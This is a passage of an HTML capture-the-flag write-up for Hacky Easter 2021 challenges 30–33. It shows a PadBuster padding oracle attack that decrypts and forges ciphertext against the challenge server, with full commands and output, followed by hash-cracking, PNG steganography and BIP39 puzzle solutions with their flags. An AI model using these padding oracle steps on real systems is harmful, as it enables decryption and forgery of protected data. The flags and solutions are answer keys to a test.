alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nClicking on <span class=\"hl\">show image<\/span> leads to <span class=\"hl\">\/picture?code=&lt;CODE&gt;<\/span>, which displays the image with the applied effect:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_03.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nBeneath the <span class=\"hl\">popular FX<\/span> codes there is one (<span class=\"hl\">41E5D00E5CECC3019834C99B403DE4B24933AF3087BCE219699D7E3EB178A06F7B4717A36C617760EC0AD8BFD5DF05B2<\/span>), which displays the desired egg. Though the applied effect makes the QR code unrecognizable:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_04.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nWhen the code is changed slightly, we get a decryption error:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_05.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nBecause of this I assumed that the application is probably vulernable to a <a href=\"https:\/\/en.wikipedia.org\/wiki\/Padding_oracle_attack\" rel=\"noopener noreferrer\" target=\"_blank\">padding oracle attack<\/a>. <a href=\"https:\/\/devel0pment.de\/?p=461#chlg22\" rel=\"noopener noreferrer\" target=\"_blank\">HackyEaster 2018<\/a> also contained a challenge based on this attack.\r\n<\/p>\r\n\r\n<p>\r\nIn order to solve this without great effort, we can use <a href=\"https:\/\/tools.kali.org\/web-applications\/padbuster\" rel=\"noopener noreferrer\" target=\"_blank\">PadBuster<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nAt first let&#8217;s decrypt the code from the egg. We simply provide the following to <span class=\"hl\">padbuster<\/span>: the target URL, an encrypted sample (the code), the blocksize (<span class=\"hl\">16<\/span>) and the encoding (<span class=\"hl\">2<\/span> = upper hex):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/30]\r\n\u2514\u2500$ <span class=\"hl2\">padbuster 'http:\/\/46.101.107.117:2110\/picture?code=41E5D00E5CECC3019834C99B403DE4B24933AF3087BCE219699D7E3EB178A06F7B4717A36C617760EC0AD8BFD5DF05B2' '41E5D00E5CECC3019834C99B403DE4B24933AF3087BCE219699D7E3EB178A06F7B4717A36C617760EC0AD8BFD5DF05B2' 16 -encoding 2<\/span>\r\n                                              \r\n+-------------------------------------------+\r\n| PadBuster - v0.3.3                        |\r\n| Brian Holyfield - Gotham Digital Science  | \r\n| labs@gdssecurity.com                      |\r\n+-------------------------------------------+\r\n\r\nINFO: The original request returned the following\r\n[+] Status: 200\r\n[+] Location: N\/A\r\n[+] Content Length: 123120   \r\n\r\nINFO: Starting PadBuster Decrypt Mode\r\n*** Starting Block 1 of 2 ***                 \r\n\r\nINFO: No error string was provided...starting response analysis\r\n\r\n*** Response Analysis Complete ***\r\n\r\nThe following response signatures were returned:\r\n\r\n-------------------------------------------------------\r\nID#     Freq    Status  Length  Location\r\n-------------------------------------------------------\r\n1       1       200     788     N\/A\r\n2 **    255     200     792     N\/A\r\n-------------------------------------------------------\r\n\r\nEnter an ID that matches the error condition\r\nNOTE: The ID# marked with ** is recommended : 2\r\n\r\nContinuing test with selection 2\r\n\r\n[+] Success: (97\/256) [Byte 16]\r\n[+] Success: (60\/256) [Byte 15]\r\n[+] Success: (167\/256) [Byte 14]\r\n[+] Success: (221\/256) [Byte 13]\r\n[+] Success: (5\/256) [Byte 12]\r\n[+] Success: (19\/256) [Byte 11]\r\n[+] Success: (237\/256) [Byte 10]\r\n[+] Success: (86\/256) [Byte 9]\r\n[+] Success: (214\/256) [Byte 8]\r\n[+] Success: (84\/256) [Byte 7]\r\n[+] Success: (128\/256) [Byte 6]\r\n[+] Success: (207\/256) [Byte 5]\r\n[+] Success: (146\/256) [Byte 4]\r\n[+] Success: (73\/256) [Byte 3]\r\n[+] Success: (56\/256) [Byte 2]\r\n[+] Success: (214\/256) [Byte 1]\r\n\r\nBlock 1 Results:\r\n[+] Cipher Text (HEX): 4933af3087bce219699d7e3eb178a06f\r\n[+] Intermediate Bytes (HEX): 3ac7b9633d8ba623a214ebfe275ac69e\r\n[+] Plain Text: {\"image\": \"egg\",\r\n\r\nUse of uninitialized value $plainTextBytes in concatenation (.) or string at \/usr\/bin\/padbuster line 361, &lt;STDIN&gt; line 1.\r\n*** Starting Block 2 of 2 ***\r\n\r\n[+] Success: (147\/256) [Byte 16]\r\n[+] Success: (95\/256) [Byte 15]\r\n[+] Success: (136\/256) [Byte 14]\r\n[+] Success: (56\/256) [Byte 13]\r\n[+] Success: (241\/256) [Byte 12]\r\n[+] Success: (168\/256) [Byte 11]\r\n[+] Success: (96\/256) [Byte 10]\r\n[+] Success: (189\/256) [Byte 9]\r\n[+] Success: (156\/256) [Byte 8]\r\n[+] Success: (117\/256) [Byte 7]\r\n[+] Success: (46\/256) [Byte 6]\r\n[+] Success: (19\/256) [Byte 5]\r\n[+] Success: (165\/256) [Byte 4]\r\n[+] Success: (60\/256) [Byte 3]\r\n[+] Success: (226\/256) [Byte 2]\r\n[+] Success: (135\/256) [Byte 1]\r\n\r\nBlock 2 Results:\r\n[+] Cipher Text (HEX): 7b4717a36c617760ec0ad8bfd5df05b2\r\n[+] Intermediate Bytes (HEX): 6911ca56e1d9816d4ba75e0acc7ba36c\r\n[+] Plain Text:  \"effect\": 4}\r\n\r\n-------------------------------------------------------\r\n** Finished ***\r\n\r\n[+] Decrypted value (ASCII): <span class=\"hl2\">{\"image\": \"egg\", \"effect\": 4}<\/span>\r\n\r\n[+] Decrypted value (HEX): 7B22696D616765223A2022656767222C2022656666656374223A20347D030303\r\n\r\n[+] Decrypted value (Base64): eyJpbWFnZSI6ICJlZ2ciLCAiZWZmZWN0IjogNH0DAwM=\r\n\r\n-------------------------------------------------------\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<span class=\"hl\">padbuster<\/span> recovers the plaintext byte by byte. After a few seconds we get the full plaintext: <span class=\"hl\">{&#8220;image&#8221;: &#8220;egg&#8221;, &#8220;effect&#8221;: 4}<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nIn order to get an image of the egg with a less noisy effect, we choose effect <span class=\"hl\">3<\/span>. At first we need to encode the plaintext we want to encrypt:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n&gt;&gt;&gt; b'{\"image\": \"egg\", \"effect\": 3}'.hex().upper()\r\n'7B22696D616765223A2022656767222C2022656666656374223A20337D'\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we can simpy provide it to <span class=\"hl\">padbuster<\/span> and run it again:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/30]\r\n\u2514\u2500$ <span class=\"hl2\">padbuster 'http:\/\/46.101.107.117:2110\/picture?code=41E5D00E5CECC3019834C99B403DE4B24933AF3087BCE219699D7E3EB178A06F7B4717A36C617760EC0AD8BFD5DF05B2' '41E5D00E5CECC3019834C99B403DE4B24933AF3087BCE219699D7E3EB178A06F7B4717A36C617760EC0AD8BFD5DF05B2' 16 -encoding 2 -encodedtext 7B22696D616765223A2022656767222C2022656666656374223A20337D<\/span>\r\n\r\n+-------------------------------------------+\r\n| PadBuster - v0.3.3                        |\r\n| Brian Holyfield - Gotham Digital Science  |\r\n| labs@gdssecurity.com                      |\r\n+-------------------------------------------+\r\n\r\nINFO: The original request returned the following\r\n[+] Status: 200                 \r\n[+] Location: N\/A               \r\n[+] Content Length: 123120     \r\n                                              \r\nINFO: Starting PadBuster Encrypt Mode\r\n[+] Number of Blocks: 2       \r\n                                              \r\nINFO: No error string was provided...starting response analysis\r\n                                              \r\n*** Response Analysis Complete ***\r\n\r\nThe following response signatures were returned:\r\n\r\n-------------------------------------------------------\r\nID#     Freq    Status  Length  Location\r\n-------------------------------------------------------\r\n1       1       200     788     N\/A\r\n2 **    255     200     792     N\/A\r\n-------------------------------------------------------\r\n\r\nEnter an ID that matches the error condition\r\nNOTE: The ID# marked with ** is recommended : 2\r\n\r\nContinuing test with selection 2\r\n\r\n[+] Success: (158\/256) [Byte 16]\r\n[+] Success: (70\/256) [Byte 15]\r\n[+] Success: (74\/256) [Byte 14]\r\n[+] Success: (159\/256) [Byte 13]\r\n[+] Success: (105\/256) [Byte 12]\r\n[+] Success: (54\/256) [Byte 11]\r\n[+] Success: (114\/256) [Byte 10]\r\n[+] Success: (169\/256) [Byte 9]\r\n[+] Success: (201\/256) [Byte 8]\r\n[+] Success: (97\/256) [Byte 7]\r\n[+] Success: (114\/256) [Byte 6]\r\n[+] Success: (164\/256) [Byte 5]\r\n[+] Success: (119\/256) [Byte 4]\r\n[+] Success: (132\/256) [Byte 3]\r\n[+] Success: (167\/256) [Byte 2]\r\n[+] Success: (111\/256) [Byte 1]\r\n\r\nBlock 2 Results:\r\n[+] New Cipher Text (HEX): a17417e236e0f64a7db3eca118b6bb60\r\n[+] Intermediate Bytes (HEX): 815672845085953e5f89cc9265b5b863\r\n\r\n\r\n[+] Success: (217\/256) [Byte 16]\r\n[+] Success: (165\/256) [Byte 15]\r\n[+] Success: (35\/256) [Byte 14]\r\n[+] Success: (169\/256) [Byte 13]\r\n[+] Success: (35\/256) [Byte 12]\r\n[+] Success: (6\/256) [Byte 11]\r\n[+] Success: (55\/256) [Byte 10]\r\n[+] Success: (173\/256) [Byte 9]\r\n[+] Success: (190\/256) [Byte 8]\r\n[+] Success: (76\/256) [Byte 7]\r\n[+] Success: (167\/256) [Byte 6]\r\n[+] Success: (134\/256) [Byte 5]\r\n[+] Success: (199\/256) [Byte 4]\r\n[+] Success: (4\/256) [Byte 3]\r\n[+] Success: (215\/256) [Byte 2]\r\n[+] Success: (213\/256) [Byte 1]\r\n\r\nBlock 1 Results:\r\n[+] New Cipher Text (HEX): 40049b591735db6961eedebd34b97b0a\r\n[+] Intermediate Bytes (HEX): 3b26f2347652be4b5bcefcd853de5926\r\n\r\n-------------------------------------------------------\r\n** Finished ***\r\n\r\n[+] Encrypted value is: <span class=\"hl2\">40049B591735DB6961EEDEBD34B97B0AA17417E236E0F64A7DB3ECA118B6BB6000000000000000000000000000000000<\/span>\r\n-------------------------------------------------------\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe result is the encrypted value, which we can now use as a code:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_06.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThis time we can scan the QR code:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/30]\r\n\u2514\u2500$ zbarimg egg.jpeg \r\nQR-Code:he2021{fl1pp1n_da_b1ts_gr34t_succ355}\r\nscanned 1 barcode symbols from 1 images in 0.02 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{fl1pp1n_da_b1ts_gr34t_succ355}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_31\">HE21.31 Hunny Bunny<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge31.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">7 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>khae<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nhunnybunny loves music! Can you figure out what else he loves?\r\n\r\n<span class=\"hl\">4ab56415e91e6d5172ee79d9810e30be5da8af18\r\nc19a3ca5251db76b221048ca0a445fc39ba576a0\r\nfdb2c9cd51459c2cc38c92af472f3275f8a6b393\r\n6d586747083fb6b20e099ba962a3f5f457cbaddb\r\n5587adf42a547b141071cedc7f0347955516ae13<\/span>\r\n\r\nflag format: <span class=\"hl\">he2021{lowercaseonlynospaces}<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\n- The values can be cracked, but they need to be changed somehow first.\r\n- One of the values represents the flag prefix.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\n<span class=\"hl\">SHA1<\/span> produces an output very similar to one of the values from the list when calculated for the beginning of the flag (<span class=\"hl\">he2021{<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/31]\r\n\u2514\u2500$ echo -n 'he2021{'|sha1sum\r\n4de56415b91b6a5172bb79a9810b30eb5ad8dc18  -\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nComparing it with the value from the list shows the following differences:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/31]\r\n\u2514\u2500$ echo -n 'he2021{'|sha1sum;echo 4ab56415e91e6d5172ee79d9810e30be5da8af18\r\n4<span class=\"hl2\">de<\/span>56415<span class=\"hl2\">b<\/span>91<span class=\"hl2\">b<\/span>6<span class=\"hl2\">a<\/span>5172<span class=\"hl2\">bb<\/span>79<span class=\"hl2\">a<\/span>9810<span class=\"hl2\">b<\/span>30<span class=\"hl2\">eb<\/span>5<span class=\"hl2\">ad<\/span>8<span class=\"hl2\">dc<\/span>18  -\r\n4<span class=\"hl2\">ab<\/span>56415<span class=\"hl2\">e<\/span>91<span class=\"hl2\">e<\/span>6<span class=\"hl2\">d<\/span>5172<span class=\"hl2\">ee<\/span>79<span class=\"hl2\">d<\/span>9810<span class=\"hl2\">e<\/span>30<span class=\"hl2\">be<\/span>5<span class=\"hl2\">da<\/span>8<span class=\"hl2\">af<\/span>18\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIt seems that the following values are swapped:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\na &lt;-&gt; d\r\nb &lt;-&gt; e\r\nc &lt;-&gt; f\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe can use the following script to reverse this modification (just swap the values again):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\ndef change_hash(h):\r\n  r = ''\r\n  for c in h:\r\n    if (c == 'a'): r += 'd'\r\n    elif (c == 'b'): r += 'e'\r\n    elif (c == 'c'): r += 'f'\r\n    elif (c == 'd'): r += 'a'\r\n    elif (c == 'e'): r += 'b'\r\n    elif (c == 'f'): r += 'c'\r\n    else: r += c\r\n  return r\r\n\r\nhashes = ['4ab56415e91e6d5172ee79d9810e30be5da8af18', 'c19a3ca5251db76b221048ca0a445fc39ba576a0', 'fdb2c9cd51459c2cc38c92af472f3275f8a6b393', '6d586747083fb6b20e099ba962a3f5f457cbaddb', '5587adf42a547b141071cedc7f0347955516ae13']\r\n\r\nfor h in hashes:\r\n  print(change_hash(h))\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script should output the actual <span class=\"hl\">SHA1<\/span> hashes:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/31]\r\n\u2514\u2500$ .\/swap0r.py \r\n4de56415b91b6a5172bb79a9810b30eb5ad8dc18\r\nf19d3fd5251ae76e221048fd0d445cf39ed576d0\r\ncae2f9fa51459f2ff38f92dc472c3275c8d6e393\r\n6a586747083ce6e20b099ed962d3c5c457fedaae\r\n5587dac42d547e141071fbaf7c0347955516db13\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we can for example use <a href=\"https:\/\/crackstation.net\" rel=\"noopener noreferrer\" target=\"_blank\">CrackStation<\/a> to crack these hashes:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_31_01.png\" alt=\"Cracked\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe only hash not cracked is the flag prefix.\r\n<\/p>\r\n\r\n<p>\r\nBy concatenating the substrings we get the flag:\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{hunnybunnyilovemumsomuch!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_32\">HE21.32 Two Yolks<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge32.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">7 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThis egg has two yolks.\r\n\r\nBut the second seems to be hidden somehow.\r\n\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_32_01.png\" width=\"300px\"\/>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nUsing <span class=\"hl\">pngcheck<\/span> we can see that the image is using a palette with <span class=\"hl\">33<\/span> entries:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ <span class=\"hl2\">pngcheck -v twoyolks.png<\/span>\r\nFile: twoyolks.png (31389 bytes)\r\n  chunk IHDR at offset 0x0000c, length 13\r\n    1024 x 1024 image, 8-bit palette, non-interlaced\r\n  chunk PLTE at offset 0x00025, length 99: <span class=\"hl2\">33 palette entries<\/span>\r\n  chunk tRNS at offset 0x00094, length 11: 11 transparency entries\r\n  chunk IDAT at offset 0x000ab, length 13903\r\n    zlib: deflated, 32K window, maximum compression\r\n  chunk YHDR at offset 0x03706, length 0:  illegal (unless recently approved) unknown, public chunk\r\nERRORS DETECTED in twoyolks.png\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIn order to get the pixel data, we can use <span class=\"hl\">binwalk<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ binwalk --extract twoyolks.png \r\n\r\nDECIMAL       HEXADECIMAL     DESCRIPTION\r\n--------------------------------------------------------------------------------\r\n0             0x0             PNG image, 1024 x 1024, 8-bit colormap, non-interlaced\r\n175           0xAF            Zlib compressed data, best compression\r\n14353         0x3811          Zlib compressed data, best compression\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe decompressed zlib data contains the pixel data, which is simply one value from the palette for each pixel:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ hexdump -C _twoyolks.png.extracted\/3811 | head\r\n00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\r\n*\r\n000001e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 03  |................|\r\n000001f0  0c 0a 05 05 08 04 04 06  06 09 09 07 07 07 0b 0f  |................|\r\n00000200  0f 0f 0f 0b 07 07 07 09  09 06 06 04 04 08 05 05  |................|\r\n00000210  0a 0c 03 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\r\n00000220  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|\r\n*\r\n000005e0  00 00 00 00 00 00 00 00  00 0c 0a 05 04 06 09 0b  |................|\r\n000005f0  0f 0f 0f 0f 0f 0f 0f 0f  0f 0f 0f 0f 0f 0f 0f 0f  |................|\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nI used the following script to display only pixel with a certain value from the palette. The script iteraters through the raw pixel data and creates an corresponding <span class=\"hl\">PIL.Image<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nimport sys\r\nfrom PIL import Image\r\n\r\nn = int(sys.argv[1])\r\n\r\nimg = Image.new('RGB', (1025,1024))\r\ndata = []\r\n\r\nct = open('_twoyolks.png.extracted\/3811','rb').read()\r\nfor c in ct:\r\n  if (c == n): data.append((0,0,0))\r\n  else: data.append((255,255,255))\r\n\r\nimg.putdata(data)\r\nimg.save('out.png')\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe palette entry <span class=\"hl\">15<\/span> turned out to be a good choice:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ .\/extract0r.py 15\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ display out.png\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_32_02.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/32]\r\n\u2514\u2500$ zbarimg out.png \r\nQR-Code:he2021{tw0_y0lks_are_gre33eat}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{tw0_y0lks_are_gre33eat}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_33\">HE21.33 Finding Mnemo<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge33.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">8 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nDorie has forgotten everything again... Luckily, there is a backup:\r\n\r\nadapt    3555  \r\nbind     824e  \r\nbless    8fcf  \r\nblind    81db  \r\ncivil    03ec  \r\ncraft    ed05  \r\ngarage   9db4  \r\ngood     d2ba  \r\nhalf     1272   \r\nhip      8d53  \r\nhome     21b7  \r\nhotel    1cb0  \r\nlonely   e5b8  \r\nmagnet   16b9  \r\nmetal    770e  \r\nmushroom dd80  \r\nnapkin   0829  \r\nreason   ecd3  \r\nrescue   5ef2  \r\nring     e3b0  \r\nshift    4ea1  \r\nsmall    f1f6  \r\nsunset   b271  \r\ntongue   f08d  \r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nGoogling for the words in the first column reveals that we are probably dealing with <a href=\"https:\/\/en.bitcoin.it\/wiki\/Seed_phrase#BIP39_and_its_flaws\" rel=\"noopener noreferrer\" target=\"_blank\">BIP39<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nBIP39 is basically a mapping between words and 11 bit values. <a href=\"https:\/\/medium.com\/coinmonks\/mnemonic-generation-bip39-simply-explained-e9ac18db9477\" rel=\"noopener noreferrer\" target=\"_blank\">Here<\/a> and <a href=\"https:\/\/learnmeabitcoin.com\/technical\/mnemonic\" rel=\"noopener noreferrer\" target=\"_blank\">here<\/a> are good descriptions.\r\n<\/p>\r\n\r\n<p>\r\nIn order to determine the 11 bit value of a word, we need to find its position within the <a href=\"https:\/\/github.com\/bitcoin\/bips\/blob\/master\/bip-0039\/english.txt\" rel=\"noopener noreferrer\" target=\"_blank\">BIP39 wordlist<\/a> and convert the index to a 11 bit value.\r\n<\/p>\r\n\r\n<p>\r\nThe second important insight is that the values in the second column are the beginning of the sha256 hash of the words. Though not of the word in the same row, but in another row:\r\n<\/p>\r\n\r\n<p>\r\nFor example <span class=\"hl\">adapt<\/span> &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/33]\r\n\u2514\u2500$ echo -n adapt|sha256sum  \r\n<span class=\"hl2\">f1f6<\/span>1cc7216e18012d97bcfc33ae7a69995846c612b317073bff4e4cd52fd353  -\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; matches the value from <span class=\"hl\">small<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\nsmall    f1f6 \r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nOr <span class=\"hl\">bind<\/span> &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/33]\r\n\u2514\u2500$ echo -n bind|sha256sum\r\n<span class=\"hl2\">f08d<\/span>d851c430f52f3fbe9692678a2e2c3cf9009035a13a5cf080ce9ed2125ce9  -\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; matches the value from <span class=\"hl\">tongue<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\ntongue   f08d  \r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWhat is also noticable here, is that the value from <span class=\"hl\">ring<\/span> &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\nring     e3b0  \r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230; seems to match the <span class=\"hl\">SHA256<\/span> hash of the empty string:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/33]\r\n\u2514\u2500$ echo -n |sha256sum \r\n<span class=\"hl2\">e3b0<\/span>c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855  -\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAccordingly there must be one word, whose <span class=\"hl\">SHA256<\/span> is not present. This word is <span class=\"hl\">half<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nIn order to get the flag we need to find the correct order of the words and determine the corresponding 11 bit value for each of them. The result is a long bit string, which only needs to be converted to ASCII to get the flag.\r\n<\/p>\r\n\r\n<p>\r\nThe reason for the <span class=\"hl\">SHA256<\/span> of <span class=\"hl\">half<\/span> not being present is that <span class=\"hl\">half<\/span> is the first word (similarly we can assume that <span class=\"hl\">ring<\/span> is the last word).\r\n<\/p>\r\n\r\n<p>\r\nIn order to determine the second word, we use the value in the second column of <span class=\"hl\">half<\/span>: <span class=\"hl\">1272<\/span>. This is the beginning of the <span class=\"hl\">SHA256<\/span> hash of <span class=\"hl\">civil<\/span>. Thus <span class=\"hl\">civil<\/span> is the next word. We proceed this until the end (word <span class=\"hl\">ring<\/span>).\r\n<\/p>\r\n\r\n<p>\r\nThe following script automates the whole process:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nimport hashlib\r\n\r\nbip39 = open('english.txt').read().split('\\n')\r\nwords = [('adapt','3555'),('bind','824e'),('bless','8fcf'),('blind','81db'),('civil','03ec'),('craft','ed05'),('garage','9db4'),('good','d2ba'),('half','1272'),('hip','8d53'),('home','21b7'),('hotel','1cb0'),('lonely','e5b8'),('magnet','16b9'),('metal','770e'),('mushroom','dd80'),('napkin','0829'),('reason','ecd3'),('rescue','5ef2'),('ring','e3b0'),('shift','4ea1'),('small','f1f6'),('sunset','b271'),('tongue','f08d')]\r\n\r\ndef get_11bit(w):\r\n  n = bip39.index(w)\r\n  return format(n, '#013b')[2:]\r\n\r\ndef get_next_word(h):\r\n  for w in words:\r\n    m = hashlib.sha256()\r\n    m.update(w[0].encode())\r\n    if (m.hexdigest()[:4] == h):\r\n      return w\r\n\r\ndef bit_str_to_ascii(s):\r\n  r = ''\r\n  for i in range(0, len(s), 8):\r\n    r += chr(int(s[i:i+8],2))\r\n  return r\r\n\r\nw = ('half','1272')\r\nbit_str = ''\r\n\r\nfor i in range(len(words)-1):\r\n  bit_str += get_11bit(w[0])\r\n  w = get_next_word(w[1])\r\n  print(w[0])\r\n\r\nprint(bit_str_to_ascii(bit_str))\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script yields the flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/33]\r\n\u2514\u2500$ .\/solv0r.py \r\ncivil\r\nmetal\r\ngood\r\nbless\r\nreason\r\nshift\r\nhome\r\ngarage\r\nnapkin\r\nsunset\r\ntongue\r\nbind\r\nrescue\r\nmushroom\r\nhip\r\nhotel\r\nlonely\r\nblind\r\nsmall\r\nadapt\r\ncraft\r\nmagnet\r\nring\r\nhe2021{f1sh_r_fr1ends_n0t_f00d!\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span 